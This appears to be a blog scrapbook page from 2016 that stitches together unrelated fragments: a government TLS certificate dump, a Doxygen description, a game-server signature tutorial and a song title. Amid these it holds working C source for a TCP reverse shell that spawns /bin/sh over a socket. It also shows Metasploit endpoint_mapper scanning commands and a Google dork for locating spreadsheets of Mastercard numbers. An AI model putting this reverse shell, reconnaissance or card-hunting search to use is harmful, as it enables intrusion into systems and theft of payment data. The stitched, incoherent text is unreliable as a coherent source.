Friday, September 2, 2016

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5

emsm-gh1-uea10.nsa.gov

C=US
O=U.S. Government
OU=DoDPKINSA/CSS
CN=emsm-gh1-uea10.nsa.gov
Fingerprints: d9fcc417c2
Issuer:
DOD ID SW CA-37
Serial:
12177
Not valid before:
2016-04-12 14:40:26 UTC
Not valid after:
2019-04-13 14:40:26 UTC
Key size:
2048
Signature Algorithm:
sha256WithRSAEncryption
authorityKeyIdentifier:
keyid:16:24:7E:F7:2D:C1:EF:92:3F:BE:44:E7:54:5E:E9:FE:17:BA:F3:A1
subjectKeyIdentifier:
53:D9:A5:2D:B9:AC:82:A0:F3:12:59:BE:C5:5B:A9:63:D6:81:83:25
authorityInfoAccess:
CA Issuers - URI:http://crl.disa.mil/sign/DODIDSWCA_37.cer
OCSP - URI:http://ocsp.disa.mil
keyUsage:
Digital Signature, Key Encipherment
crlDistributionPoints:
Full Name: URI:http://crl.disa.mil/crl/DODIDSWCA_37.crl
subjectAltName:
DNS:emsm-gh1-uea10.nsa.gov
certificatePolicies:
Policy: 2.16.840.1.101.2.1.11.39
extendedKeyUsage:
TLS Web Server Authentication, TLS Web Client Authentication, 1.3.6.1.5.5.8.2.2

Certificates

Fingerprint  Issuer  Serial  Public Key
d9fcc417c29a037dac90aea5f178e91d59ec9862  DOD ID SW CA-37  12177  d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

shell_reverse_tcp.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
int main(void) {
    int sockfd;         // file descriptor for socket
    int lportno = 12345;    // listener port
    struct sockaddr_in serv_addr; // {2,str[14]}
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};
 
    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost
    serv_addr.sin_port = htons(lportno);  // network byte order (big endian)
    connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); // sizeof is 16
    // redirect stdin, stdout and stderr to the socket
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr
    execve("/bin/sh",params,environ);
    return 0; // reached only if execve fails
}

 
 
 
YOU NEED TO KNOW WHERE TO GO:
 
 

endpoint_mapper

The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
msf > use auxiliary/scanner/dcerpc/endpoint_mapper 
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/ 

Server signature, how to get it?

Server signature is now available for everyone, I'll just show with pictures where to get it and how to use it.
That's pretty simple.

Go to serverlist, choose the server you are interested in, check bottom infos to get the signature code.
(click on the picture to see fullsize)



Once you clicked on server signature you should get this:



Copy the code & insert it to your signature for example, using the "Insert Image" function

Which gives:



Tips: select your image (double click on it) then add a link, example: http://et.trackbase.net/server/41109/
So if you click on your signature, you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool




Doxygen

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:
  1. It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in LaTeX) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
  2. You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
  3. You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).
Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/ 


Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/ 

Cielo e terra (duet with Dante Thomas)